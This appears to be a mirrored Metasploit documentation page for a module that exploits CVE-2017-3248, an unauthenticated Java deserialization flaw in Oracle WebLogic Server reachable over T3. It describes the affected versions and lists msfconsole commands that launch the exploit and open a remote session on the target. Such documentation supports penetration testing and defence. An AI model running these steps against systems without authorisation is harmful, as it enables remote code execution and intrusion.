Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/multi/misc/weblogic_deserialize_unicastref.md
Views: 11784
Description
Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.1 are vulnerable to a deserialization vulnerability (CVE 2017-3248) in the core Components subcomponent due to unsafe deserialization of Java objects by the RMI registry and produce a JRMP connection from the target, which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.
Vulnerable Application
Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.1.
Verification Steps
./msfconsole -q
use exploit/multi/misc/weblogic_deserialize_unicastref
set srvhost <srvhost>
set srvport <srvport>
set rhosts <rhost>
set rport <srvport>
exploit
sessions -i 1